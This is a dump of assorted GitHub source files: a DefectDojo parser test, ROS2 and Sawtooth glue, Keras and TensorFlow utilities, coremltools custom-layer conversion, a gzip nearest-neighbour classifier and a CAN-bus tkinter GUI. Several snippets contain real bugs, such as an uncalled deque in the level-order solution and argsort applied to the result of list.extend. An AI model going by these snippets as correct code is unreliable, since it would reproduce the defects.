XanitizerParser\r\nfrom dojo.models import Test\r\n\r\n\r\nclass TestXanitizerParser(DojoTestCase):\r\n\r\n def test_parse_file_with_no_findings(self):\r\n testfile = open(\"unittests/scans/xanitizer/no-findings.xml\")\r\n parser = XanitizerParser()\r\n findings = parser.get_findings(testfile, Test())\r\n self.assertEqual(0, len(findings))\r\n\r\n def test_parse_file_with_one_findings(self):\r\n testfile = open(\"unittests/scans/xanitizer/one-findings.xml\")\r\n parser = XanitizerParser()\r\n findings = parser.get_findings(testfile, Test())\r\n self.assertEqual(1, len(findings))\r\n\r\n def test_parse_file_with_multiple_findings(self):\r\n testfile = open(\"unittests/scans/xanitizer/multiple-findings.xml\")\r\n parser = XanitizerParser()\r\n findings = parser.get_findings(testfile, Test())\r\n self.assertEqual(9, len(findings))\r\n finding = findings[5]\r\n self.assertEqual(1, len(finding.unsaved_vulnerability_ids))\r\n self.assertEqual(\"CVE-2015-5211\", finding.unsaved_vulnerability_ids[0])\r\n\r\n def test_parse_file_with_multiple_findings_no_details(self):\r\n testfile = open(\r\n get_unit_tests_path() + \"/scans/xanitizer/multiple-findings-no-details.xml\"\r\n )\r\n parser = XanitizerParser()\r\n findings = parser.get_findings(testfile, Test())\r\n self.assertEqual(9, 
len(findings))\r\n","repo_name":"DefectDojo/django-DefectDojo","sub_path":"unittests/tools/test_xanitizer_parser.py","file_name":"test_xanitizer_parser.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":3128,"dataset":"github-code","pt":"18"} +{"seq_id":"4665802658","text":"import argparse\nimport tensorflow as tf\n\ndef get_args():\n argparser = argparse.ArgumentParser(description=__doc__)\n argparser.add_argument(\n '-c', '--config',\n metavar='C',\n default='None',\n help='The Configuration file')\n args = argparser.parse_args()\n return args\n\ndef initialize_vocab(vocab_path):\n if tf.gfile.Exists(vocab_path):\n rev_vocab = []\n with tf.gfile.GFile(vocab_path, mode=\"r\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip('\\n') for line in rev_vocab] # id, token\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)]) # token, id\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocab_path)\n\nif __name__ == '__main__':\n vocab_path = '../data/vocab.dat'\n vocab, rev_vocab = initialize_vocab(vocab_path)\n print(vocab['and'])\n","repo_name":"michael0905/cnn-text-classifier","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19522142824","text":"# coding: utf-8\n\nfrom cms.plugin_base import CMSPluginBase\nfrom cms.plugin_pool import plugin_pool\n\n\nclass StudentInfoPlugin(CMSPluginBase):\n name = u\"Списки студентов\"\n render_template = \"students/manager/index.html\"\n text_enabled = False\n allow_children = False\n\n\nplugin_pool.register_plugin(StudentInfoPlugin)","repo_name":"SevenLines/django-tealeaf","sub_path":"students/cms_plugins.py","file_name":"cms_plugins.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10000594516","text":"import sys, argparse, os\nimport cPickle as pickle\n\n\ndef main(argv=None): # IGNORE:C0111\n '''Command line options.'''\n# print(\"Running run_particle!\")\n sys.stdout.flush()\n if argv is None:\n argv = sys.argv\n else:\n sys.argv.extend(argv)\n \n parser = argparse.ArgumentParser(description=\"Run single particle until result accepted.\")\n parser.add_argument(\"-i\", \"--input\", action=\"store\", dest=\"pickle_file\", required=True, help=\"Path and name of pickle file containing particle.\")\n parser.add_argument(\"-o\", \"--output\", action=\"store\", dest=\"result_file\", required=True, help=\"Path and name of file for output.\")\n args = parser.parse_args()\n \n pickle_file = args.pickle_file\n result_file = args.result_file\n \n print(\"\\nLoading particle (dev run_particle) ...\")\n if os.path.isfile(pickle_file):\n print(\"Reading pickle file ...\")\n f_in = open(pickle_file, 'r')\n particle = pickle.load(f_in)\n f_in.close()\n else:\n print(\"'{}' does not exist\".format(pickle_file)) \n sys.exit()\n \n print(\"Finding acceptable theta ...\")\n theta_accepted, ln_w, distance, proposed_theta_idx = particle.find_accepted_theta()\n print(\"... 
accepted theta.\")\n \n ## Write results to output file\n f_out = open(result_file, 'w')\n f_out.write(\"{}\\t{}\\t{}\\t{}\".format(\",\".join([str(int(theta)) for theta in theta_accepted]), str(ln_w), str(distance), str(proposed_theta_idx)))\n f_out.close()\n print(\"Printed results to file.\")\n \n \n\nif __name__ == \"__main__\":\n main()\n \n ","repo_name":"wbryant/ARBOC-COBRA","sub_path":"run_particle.py","file_name":"run_particle.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8478802434","text":"import rclpy\nfrom rclpy.node import Node\nfrom blockchain_bots_interfaces.srv import ConnectToSawtoothSim, SendCommandToSawtoothSim\nfrom .sawtoothClient import sawtoothClient\n\nclass Sawtooth(Node):\n \"\"\"A class to implement the bridge between ROS2 and Sawtooth.\n\n ...\n\n Description\n -----------\n A child class of the Node class. This node acts as the server for the 2 services \n (namely connect_to_sawtooth and send_command_to_sawtooth) that implement the bridge \n between the other ros2 nodes and the Sawtooth blockchain.\n\n Attributes\n ----------\n srv1 : rclpy.service.Service\n Service for connection with the python server in the sawtooth client docker container.\n srv2 : rclpy.service.Service\n Service to send commands to the connected sawtooth client docker container.\n\n\n Methods\n -------\n connect_to_sawtooth_callback(request, response):\n The callback that implements srv1\n send_command_to_sawtooth_callback (request, response):\n The callback that implements srv2\n \"\"\"\n\n def __init__(self):\n super().__init__('minimal_service')\n self.srv1 = self.create_service(ConnectToSawtoothSim, 'connect_to_sawtooth', self.connect_to_sawtooth_callback)\n self.srv2 = self.create_service(SendCommandToSawtoothSim, 'send_command_to_sawtooth', self.send_command_to_sawtooth_callback)\n \n def connect_to_sawtooth_callback (self, request, response):\n \"\"\"The callback that implements srv1\n\n ...\n\n Description\n -----------\n Given the host IP and the port it connects to the respective docker container \n using the custom made sawtoothClient class. Now one node handles the services \n from all the robots, the robot_id is used to create each instance.(TODO: Create\n one server node for each robot.)\n \"\"\"\n\n host = request.host\n port = request.port\n robot_id = request.robot_id\n if robot_id == 0:\n try:\n self.clientInstance0 = sawtoothClient(host,port)\n except:\n response.result = False\n return response\n else:\n try:\n self.clientInstance1 = sawtoothClient(host,port)\n except:\n response.result = False\n return response\n response.result = True\n self.get_logger().info('Connected to sawtooth client:\\nIP: %s:%d for robot_id %d' % (request.host, request.port, request.robot_id))\n\n return response\n \n def send_command_to_sawtooth_callback (self, request, response):\n \"\"\"The callback that implements srv2.\n\n ...\n\n Description\n -----------\n Based on the robot_id which calls srv2, a set, inc, show or list command is sent to the\n respective sawtooth-client docker container which in term requests the respective transaction\n from the IntKey TP. 
\n \"\"\"\n robot_id = request.robot_id\n\n if robot_id == 0: # Case for commands sent by 1st robot\n commandType = request.command_type\n stationNum = request.station_num\n value = request.value\n if commandType == \"set\":\n result = self.clientInstance0.sendSet(stationNum, value)\n elif commandType == \"inc\":\n result = self.clientInstance0.sendInc(stationNum, value)\n elif commandType == \"show\":\n result = self.clientInstance0.sendShow(stationNum)\n elif commandType == \"list\":\n result = self.clientInstance0.sendList()\n else:\n result = \"FALSE COMMAND\"\n else: # Case for commands sent by 2nd robot\n commandType = request.command_type\n stationNum = request.station_num\n value = request.value\n if commandType == \"set\":\n result = self.clientInstance1.sendSet(stationNum, value)\n elif commandType == \"inc\":\n result = self.clientInstance1.sendInc(stationNum, value)\n elif commandType == \"show\":\n result = self.clientInstance1.sendShow(stationNum)\n elif commandType == \"list\":\n result = self.clientInstance1.sendList()\n else:\n result = \"FALSE COMMAND\"\n self.get_logger().info('Transaction by robot_id: %d for commad:\\nCommand Type: %s, station%d, value: %d' % (robot_id, commandType, stationNum, value))\n self.get_logger().info('RESPONSE: %s' %(result))\n response.result = result\n return response\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n minimal_service = Sawtooth()\n\n rclpy.spin(minimal_service)\n\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"smarnakis/blockchain_bots","sub_path":"sawtooth_bridge/sawtooth_bridge/sawtooth_bridge_server.py","file_name":"sawtooth_bridge_server.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12006893451","text":"import collections\r\nfrom typing import List\r\n\r\n\r\nclass TreeNode:\r\n def __init__(self, x):\r\n self.val = x\r\n self.left = None\r\n self.right = None\r\n\r\nclass Solution:\r\n def levelOrder(self, root: TreeNode) -> List[List[int]]:\r\n queue = collections.deque\r\n queue.append(root)\r\n ans = []\r\n while queue:\r\n size = len(queue)\r\n temp_node = []\r\n for _ in range(size):\r\n cur = queue.popleft()\r\n if not cur:\r\n continue\r\n temp_node.append(cur.val)\r\n queue.append(cur.left)\r\n queue.append(cur.right)\r\n if temp_node:\r\n ans.append(temp_node)\r\n return ans\r\n\r\n","repo_name":"longshirong/python","sub_path":"LeetCode/binaryTree/levelOrder.py","file_name":"levelOrder.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2732053214","text":"from memo import*\nfrom datetime import datetime\n\n\n\nwhile True:\n user = input('名前を入力してください')\n\n menus = ['登録:1','削除:2','編集:3','照会:4']\n for menu in menus:\n print(menu)\n selected_number = input('メニュー番号を選んでください')\n #メモの追加\n if selected_number == '1':\n memonaiyou = str(input('メモの内容を入力してください'))\n print('メモの内容:'+ memonaiyou)\n makeTime = datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\")\n makeTime = str(makeTime)\n print('作成\b日時:'+makeTime)\n createdata(user,memonaiyou, makeTime)\n\n\n #メモの削除\n elif selected_number == '2':\n index = input('削除したい番号を選んでください:')\n print('メモを削除しました。')\n\n #メモの照会\n elif selected_number == '3':\n memo.inquirydata()\n\n #メモの更新\n elif selected_number == '4':\n index = input('更新したいメモの番号を選んでください:')\n memo.update(memo_list,index)\n # やり直し\n else:\n print('不正な値が入力されました。')\n 
continue\n","repo_name":"genytoday/memo_project","sub_path":"memo_bl.py","file_name":"memo_bl.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18967219939","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jan 10 17:14:47 2019\r\n\r\n@author: wzy\r\n\"\"\"\r\nfrom sklearn import datasets\r\nimport numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.utils import to_categorical\r\nfrom keras.callbacks import ModelCheckpoint\r\n\r\n\r\ndataset = datasets.load_iris()\r\nx = dataset.data\r\nY = dataset.target\r\nY_labels = to_categorical(Y, num_classes=3)\r\nseed = 4\r\nnp.random.seed(seed)\r\n\r\n\r\ndef create_model(optimizer='rmsprop', init='glorot_uniform'):\r\n model = Sequential()\r\n model.add(Dense(units=4, activation='relu', input_dim=4, kernel_initializer=init))\r\n model.add(Dense(units=6, activation='relu', kernel_initializer=init))\r\n model.add(Dense(units=3, activation='softmax', kernel_initializer=init))\r\n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\r\n return model\r\n\r\n\r\nmodel = create_model()\r\n# 设置检查点\r\nfilepath = '../model/weights.best.h5'\r\ncheckpoint = ModelCheckpoint(filepath=filepath, monitor='val_acc', verbose=1, save_best_only=True, mode='max')\r\ncallback_list = [checkpoint]\r\nmodel.fit(x, Y_labels, validation_split=0.2, epochs=200, batch_size=5, verbose=0, callbacks=callback_list)\r\n# 加载最优权重到新的模型\r\nnew_model = create_model()\r\nnew_model.load_weights(filepath='../model/weights.best.h5')\r\nscores = new_model.evaluate(x, Y_labels, verbose=0)\r\nprint('%s: %.2f%%' % (new_model.metrics_names[1], scores[1]*100))\r\n\r\n","repo_name":"wzy6642/Deep_Learning_Keras","sub_path":"use_best_model/code/use_best_model.py","file_name":"use_best_model.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"18"} +{"seq_id":"5351101775","text":"# Parallel processing version of 1_2_nn_plus_gzip_fix-tie-breaking.ipynb\n# On a 2020 MacBook Air, it runs about 4 times faster ~1 iter/sec\n# than the non-parallel version (~4 iter/sec)\n\n# It should finish in about 2-3 h compared to ~12 h before\n\nfrom collections import Counter\nimport gzip\nimport multiprocessing as mp\nimport os.path as op\n\nfrom joblib import Parallel, delayed\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom local_dataset_utilities import download_dataset, load_dataset_into_to_dataframe, partition_dataset\n\n\ndef process_dataset_subset(df_train_subset, test_text, c_test_text, d):\n\n distances_to_test = []\n for row_train in df_train_subset.iterrows():\n index = row_train[0]\n train_text = row_train[1][\"text\"]\n c_train_text = d[index]\n\n train_plus_test = \" \".join([test_text, train_text])\n c_train_plus_test = len(gzip.compress(train_plus_test.encode()))\n\n ncd = ( (c_train_plus_test - min(c_train_text, c_test_text))\n / max(c_test_text, c_train_text) )\n\n distances_to_test.append(ncd)\n\n return distances_to_test\n\n\ndef divide_range_into_chunks(start, end, num_chunks):\n chunk_size = (end - start) // num_chunks\n ranges = [(i, i + chunk_size) for i in range(start, end, chunk_size)]\n ranges[-1] = (ranges[-1][0], end) # Ensure the last chunk includes the end\n return ranges\n\n\nif __name__ == '__main__':\n\n if not op.isfile(\"train.csv\") and not op.isfile(\"val.csv\") and not 
op.isfile(\"test.csv\"):\n download_dataset()\n\n df = load_dataset_into_to_dataframe()\n partition_dataset(df)\n\n df_train = pd.read_csv(\"train.csv\")\n df_val = pd.read_csv(\"val.csv\")\n df_test = pd.read_csv(\"test.csv\")\n\n num_processes = mp.cpu_count()\n k = 2\n predicted_classes = []\n\n start = 0\n end = df_train.shape[0]\n ranges = divide_range_into_chunks(start, end, num_chunks=num_processes)\n\n\n # caching compressed training examples\n d = {}\n for i, row_train in enumerate(df_train.iterrows()):\n train_text = row_train[1][\"text\"]\n train_label = row_train[1][\"label\"]\n c_train_text = len(gzip.compress(train_text.encode()))\n \n d[i] = c_train_text\n\n # main loop\n for row_test in tqdm(df_test.iterrows(), total=df_test.shape[0]):\n\n test_text = row_test[1][\"text\"]\n test_label = row_test[1][\"label\"]\n c_test_text = len(gzip.compress(test_text.encode()))\n all_train_distances_to_test = []\n\n # parallelize iteration over training set into num_processes chunks\n with Parallel(n_jobs=num_processes, backend=\"loky\") as parallel:\n\n results = parallel(\n delayed(process_dataset_subset)(df_train[range_start:range_end], test_text, c_test_text, d)\n for range_start, range_end in ranges\n )\n for p in results:\n all_train_distances_to_test.extend(p)\n\n sorted_idx = np.argsort(np.array(all_train_distances_to_test.extend))\n top_k_class = np.array(df_train[\"label\"])[sorted_idx[:k]]\n predicted_class = Counter(top_k_class).most_common()[0][0]\n\n predicted_classes.append(predicted_class)\n\n print(\"Accuracy:\", np.mean(np.array(predicted_classes) == df_test[\"label\"].values))","repo_name":"rasbt/nn_plus_gzip","sub_path":"1_2_caching-multiprocessing.py","file_name":"1_2_caching-multiprocessing.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"18"} +{"seq_id":"35780454402","text":"# 실버 4\n\nimport sys\n\ninput = sys.stdin.readline\n\n\ndef dfs(x, y):\n if shape == \"-\":\n nx, ny = x, y + 1\n else:\n nx, ny = x + 1, y\n\n if nx < n and ny < m and not visited[nx][ny] and floor[nx][ny] == shape:\n visited[nx][ny] = True\n dfs(nx, ny)\n\n\nn, m = map(int, input().split())\nfloor = [input().rstrip() for _ in range(n)]\nvisited = [[False] * m for _ in range(n)]\nresult = 0\n\nfor i in range(n):\n for j in range(m):\n if not visited[i][j]:\n visited[i][j] = True\n shape = floor[i][j]\n dfs(i, j)\n result += 1\n\nprint(result)\n","repo_name":"what-the-study/what-the-algorithm","sub_path":"youngjoo/BOJ/DFS_BFS/1388_바닥_장식.py","file_name":"1388_바닥_장식.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42110815168","text":"#!/usr/bin/env python3\n# This file extends the client in lib.network.client\nfrom lib.network.distributed_client import Client\nfrom configparser import SafeConfigParser\nfrom lib.card.card import Card\nfrom urllib.request import Request\nfrom urllib.request import urlopen\nfrom urllib.request import HTTPError\nimport socket\nimport time\nimport json\nimport re\n\n\nclass GathererClient(Client):\n __failstrs__ = [\"2cb5f52b7de8f981bbe74c8b81faf7a4\"]\n __tmplate__ = \"http://gatherer.wizards.com/Pages/Card/Details.aspx?multiverseid=%i\"\n __rsp__ = 'OK'\n\n def __init__(self, *args, **kwargs):\n Client.__init__(self, *args, **kwargs)\n self.__delay__ = 5\n self.__has_deck__ = False\n self.__data__ = b''\n self.__d_id__ = 0\n self.__sleep_flag__ = False\n\n def 
upkeep(self):\n if not self.__has_deck__:\n self.__conn__.send(\"NEXT\".encode())\n else:\n self.__conn__.send((\"OKAY %i\" % len(self.__data__)).encode())\n\n def handle(self, m):\n m = m.split(' ', 1)\n\n if m[0] == 'PAGEID':\n self.__d_id__ = int(m[1])\n text = \"\"\n try:\n text = str(urlopen(Request((self.__tmplate__ % self.__d_id__))\n ).read(), \"utf-8\")\n print(\"GOT CARD %i\" % (self.__d_id__))\n text = re.sub(r'\\xe2', '-', text)\n# print(text)\n c = Card(None)\n c.loadFromGatherer(text)\n print(c.export())\n self.__data__ = json.dumps(c.export()).encode()\n self.__has_deck__ = True\n\n except HTTPError:\n self.__conn__.send((\"FAIL %i\" % self.__d_id__).encode())\n print(\"FAILED CARD ID %i, REDIRECT\" % self.__d_id__)\n return\n\n except RuntimeError as e:\n msg = \"FAILED TO PARSE DECK, '%s'\" % str(e)\n self.__conn__.send((\"FAIL %i %s\" % (self.__d_id__,\n msg).encode()))\n print(msg)\n return\n\n except Exception as e:\n print(e)\n self.__conn__.send((\"FATAL %s\" % str(e)).encode())\n self.__conn__.close()\n self.join()\n\n elif m[0] == 'GOAHEAD':\n print(\"GOT GOAHEAD SIGNAL\")\n print(self.__data__)\n self.__conn__.send(self.__data__)\n\n elif m[0] == '1':\n print(\"UPLOADED CARD %7i\" % (self.__d_id__))\n self.__has_deck__ = False\n self.__sleep_flag__ = True\n\n elif m[0] == '0':\n print(\"ERROR UPLOADING DECK %i CONTINUING....\" % self.__d_id__)\n\n elif m[0] == 'RECONNECT':\n HOST, PORT = self.__conn__.getpeername(), 9001\n self.__conn__.close()\n time.sleep(int(m[1]))\n self.__conn__ = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.__conn__.bind((HOST, PORT))\n\n elif m[0] == 'DONE':\n print(\"RECIEVED DONE SIGNAL FROM SERVER\")\n self.__conn__.close()\n self.join()\n\n if(self.__sleep_flag__):\n time.sleep(self.__delay__)\n self.__sleep_flag__ = False\n\nif __name__ == \"__main__\" or 1:\n parser = SafeConfigParser()\n parser.read('/u/reid/OpenSourcerer/settings.ini')\n\n client = GathererClient(parser.get('scrape', 'master'),\n int(parser.get('scrape', 'port')),\n )\n client.daemon = False\n client.run()\n\n","repo_name":"arrdem/OpenSourcerer","sub_path":"gatherer_client.py","file_name":"gatherer_client.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"37669611638","text":"import argparse\nimport shutil\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport coremltools\n\nCOREMLTOOLS_SUPPORTED_VERSION = '4.1'\n\nassert coremltools.__version__ == COREMLTOOLS_SUPPORTED_VERSION, \\\n f\"Please install coremltools version {COREMLTOOLS_SUPPORTED_VERSION}: \" + \\\n f\"`python3 -m pip uninstall coremltools && python3 -m pip install coremltools==={COREMLTOOLS_SUPPORTED_VERSION}`\\n\" + \\\n f\"current version: {coremltools.__version__}\"\n\nfrom coremltools.converters.mil.mil import Builder as mb\nimport coremltools.proto.FeatureTypes_pb2 as ft\nfrom coremltools.converters.mil.mil.ops.defs._op_reqs import (\n register_op, Operation, InputSpec, TensorInputType, IntInputType, BoolInputType,\n types\n)\nfrom coremltools.converters.mil.frontend.torch.ops import (\n _get_inputs as mil_get_inputs\n)\nfrom coremltools.converters.mil.backend.nn.op_mapping import (\n make_input\n)\nfrom coremltools.converters.mil import (\n register_torch_op\n)\nfrom coremltools.converters.mil.backend.nn.mil_to_nn_mapping_registry import (\n register_mil_to_nn_mapping\n)\n\n@register_mil_to_nn_mapping(override=True)\ndef grid_sample(const_context, builder, 
op):\n image_name = make_input(const_context, builder, op.input)\n grid_name = make_input(const_context, builder, op.grid)\n out_name = op.outputs[0].name\n\n suffix = \"_prepared\"\n input_names1 = [grid_name]\n out_names1 = [out_name + suffix]\n\n input_names2 = [image_name, out_names1[0]]\n out_names2 = [out_name]\n\n # transpose the grid to [n, 2, w, h] shape (for encoding it to a coreml 2-channel texture)\n builder.add_transpose(\n name=op.name + suffix,\n axes=(0, 3, 1, 2),\n input_name=input_names1[0],\n output_name=out_names1[0],\n )\n spec_layer = builder._add_generic_layer(op.name, input_names2, out_names2)\n\n spec_layer_params = spec_layer.custom\n spec_layer_params.className = \"GridSampleLayer\"\n \n@register_op(doc_str=\"\")\nclass grid_sample(Operation):\n \n input_spec = InputSpec(\n input=TensorInputType(),\n grid=TensorInputType(),\n mode=IntInputType(const=True),\n padding_mode=IntInputType(const=True),\n align_corners=BoolInputType(const=True),\n )\n\n bindings = {\n \"class_name\": \"grid_sample\",\n \"input_order\": [\"input\", \"grid\"],\n \"parameters\": [\"mode\", \"padding_mode\", \"align_corners\"],\n \"description\": \"PyTorch grid_sample\",\n }\n\n def __init__(self, **kwargs):\n super(grid_sample, self).__init__(**kwargs)\n\n def type_inference(self):\n input_type = self.input.dtype\n ret_shape = self.input.shape\n return types.tensor(input_type, ret_shape)\n\n@register_torch_op(torch_alias=[\"grid_sampler\"], override=True)\ndef torch_grid_sample(context, node):\n inputs = mil_get_inputs(context, node, expected=5)\n res = mb.grid_sample(\n input=inputs[0], \n grid=inputs[1], \n mode=inputs[2], \n padding_mode=inputs[3], \n align_corners=inputs[4],\n name=node.name\n )\n context.add(res)\n\n\n########################################################################\n######################## Test ml model #################################\n########################################################################\n\nIN_WH = 512\nGRID_WH = 256\n\nclass TestModel(nn.Module):\n\n def forward(self, x, grid):\n grid_resized = self.resize_grid(grid)\n return F.grid_sample(\n x, grid_resized\n )\n\n def resize_grid(self, grid):\n # [1, GRID_WH, GRID_WH, 2] => [1, 2, GRID_WH, GRID_WH]\n grid_resized = grid.permute(0, 3, 1, 2)\n # [1, 2, GRID_WH, GRID_WH] => [1, 2, IN_WH, IN_WH]\n grid_resized = F.interpolate(\n grid_resized, \n size=(IN_WH, IN_WH), \n mode='nearest'\n )\n # [1, 2, IN_WH, IN_WH] => [1, IN_WH, IN_WH, 2]\n grid_resized = grid_resized.permute(0, 2, 3, 1)\n return grid_resized\n\n########################################################################\n########################################################################\n\ndef convert(output_path):\n torch_model = TestModel()\n example_input = torch.rand(1, 3, IN_WH, IN_WH) \n example_grid = torch.rand(1, GRID_WH, GRID_WH, 2) \n traced_model = torch.jit.trace(torch_model, (example_input, example_grid))\n\n mlmodel = coremltools.convert(\n traced_model,\n inputs=[\n coremltools.ImageType(name=\"image_input\", shape=example_input.shape), \n coremltools.TensorType(name=\"warp_grid\", shape=example_grid.shape)\n ],\n minimum_deployment_target=coremltools.target[\"iOS13\"]\n )\n mlmodel_path = output_path + \".mlmodel\"\n mlmodel.save(mlmodel_path)\n\n spec = coremltools.utils.load_spec(mlmodel_path)\n\n output_layer = spec.description.output[0]\n output_layer.type.imageType.colorSpace = ft.ImageFeatureType.RGB\n output_layer.type.imageType.height, output_layer.type.imageType.width = IN_WH, IN_WH\n 
coremltools.utils.rename_feature(spec, output_layer.name, 'output')\n\n coremltools.utils.save_spec(spec, mlmodel_path)\n\n shutil.copyfile(mlmodel_path, output_path)\n\n print(f\"Saved to {output_path}\")\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-o', '--output', \n default='./TorchCoreMLDemo/TorchCoreMLDemo/Assets/model.pb', \n help='Output file'\n )\n args = parser.parse_args()\n convert(args.output)\n\nif __name__ == \"__main__\":\n main()","repo_name":"dneprDroid/pytorch-coreml-custom-layer-example","sub_path":"Convert/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"18635166434","text":"from tkinter import *\nimport can\nimport struct\nimport serial\nimport time\n\nroot = Tk()\n\nroot.geometry(\"480x370\") # (\"width x height\").\nroot.minsize(480,370) # (width, height)\nroot.maxsize(480, 480)\n# root.configure(bg=\"white\")\n\nroot.title(\"TEMP CONTROL CARD GUI\")\n\nSETPOINT = IntVar()\nTEMP = StringVar()\nSTATE = StringVar()\nSWITCH_STATE = StringVar()\nSWITCH_STATE.set(\"STATE IS OFF!\")\n\nSETPOINT_R = IntVar()\nSTATE_R = IntVar()\nTEMP_R = StringVar()\nSTATE_R = StringVar()\n\nport = serial.Serial(port='/dev/ttyACM0')\n\nglobal SW_STATE\nSW_STATE = False\n\n# ///////////////////////////////////////////////////////////////////////////////////////////////\n\ndef read_temp_callback(): # currently it is printing the data that is in the stack of the serial buffer not the latest one..\n\n data_serial = port.readline().decode().rstrip() # Read a line of data from the serial port and decode it\n # print(data_serial)\n if \"TEMP:\" in data_serial:\n data_array = data_serial.split(\" \")\n # print(data_array[1])\n TEMP_R.set(f\"Temperature: {data_array[1]}\")\n \n # print(data_array[4])\n STATE_R.set(f\"State: {data_array[4]}\")\n\n # print(data_array[7])\n SETPOINT_R.set(F\"Setpoint: {data_array[7]}\")\n\n root.after(10, read_temp_callback)\n # break \n\n\n\n# ////////////////////////////////////////////////////////////////////////////////////////////////\n\ndef setpoint_button_callback():\n # sending the setpoint\n # print(STATE.get())\n T = float(SETPOINT.get())\n # print(type(T))\n # print(T)\n byte_arr = bytearray(struct.pack(\"f\", float(T)))\n\n bus = can.interface.Bus(channel='can0', bustype='socketcan')\n can_msg = can.Message(arbitration_id = 0x110,\n data = [0, 0, byte_arr[0], byte_arr[1], byte_arr[2], byte_arr[3], 0, 0],\n is_extended_id = False)\n bus.send(can_msg)\n bus.shutdown()\n\n\ndef state_button_callback():\n # print(SETPOINT.get())\n\n global SW_STATE\n print(\"callback funcf. called.\")\n if (SW_STATE == True):\n SW_STATE = False\n SWITCH_STATE.set(\"STATE IS OFF!\")\n # print(\" state is OFF\")\n else:\n SW_STATE = True\n SWITCH_STATE.set(\"STATE IS ON! 
\")\n # print(\" state is ON\")\n\n if(SW_STATE == True):\n bus = can.interface.Bus(channel='can0', bustype='socketcan')\n can_msg = can.Message(arbitration_id = 0x104,\n data = [1, 0, 0, 0, 0, 0, 0, 0],\n is_extended_id = False)\n bus.send(can_msg)\n bus.shutdown()\n\n if(SW_STATE == False):\n bus = can.interface.Bus(channel='can0', bustype='socketcan')\n can_msg = can.Message(arbitration_id = 0x104,\n data = [0, 0, 0, 0, 0, 0, 0, 0],\n is_extended_id = False)\n bus.send(can_msg)\n bus.shutdown()\n\n# //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\n\nlabel1 = Label(text = \"Morphle\", bg = \"purple\", fg = \"white\", padx= 204, pady = 4, font = (\"calibri\", 12, \"bold\")).grid(columnspan=3)\n\nSTATE_LABEL = Label (root, text=\"STATE\", padx = 0, pady = 2, border = 10) .grid(row=1, column=0)\nSETPOINT_LABEL = Label (root, text=\"SETPOINT\", padx = 0, pady = 2, border = 10) .grid(row=2, column=0)\n\nGAP1 = Label (root, text=\"\", pady=10) .grid(row=3, columnspan=3)\nTEMP_STATUS_TITLE = Label (root, text=\"TEMPERATURE\", bg = \"grey\", padx = 166, pady = 4) .grid(row=4, columnspan=3)\nTEMP_STATUS_BAR = Label (root, textvariable = TEMP_R, bg = \"white\",fg=\"grey\", padx = 82, pady = 4, border = 2, font=(\" \", 14, \"bold\")) .grid(row=5, columnspan=3)\n\nGAP2 = Label (root, text=\"\", pady=0) .grid(row=6, columnspan=3)\nSTATE_STATUS_TITLE = Label (root, text=\"CURRENT STATE\", bg = \"grey\", padx = 160, pady = 4) .grid(row=7, columnspan=3)\nSTATE_STATUS_BAR = Label (root, textvariable = STATE_R, bg = \"white\", padx = 188, pady = 4, border = 2) .grid(row=8, columnspan=3)\n\nGAP3 = Label (root, text=\"\", pady=0) .grid(row=9, columnspan=3)\nSETPOINT_STATUS_TITLE = Label (root, text=\"CURRENT SETPOINT\", bg = \"grey\", padx = 148, pady = 4) .grid(row=10, columnspan=3)\nSETPOINT_STATUS_BAR = Label (root, textvariable = SETPOINT_R, bg = \"white\", padx = 174, pady = 4, border = 2) .grid(row=11, columnspan=3)\n\nSETPOINT_ENTRY = Entry (root, textvariable = SETPOINT) .grid(row=2, column=1)\n\nSTATE_BUTTON = Button (root, textvariable=SWITCH_STATE, command = state_button_callback, padx=104) .grid(row=1, column=1, columnspan=2)\nSETPOINT_BUTTON = Button (root, text=\"SET\", command = setpoint_button_callback, padx=30) .grid(row=2, column=2)\n# READ_TEMP_BUTTON = Button (root, text=\"READ TEMPERATURE\", command = read_temp_callback, border = 2) .grid(row=6, columnspan=3)\n\nroot.after(1000, read_temp_callback)\n \nroot.mainloop()\n\n\n# 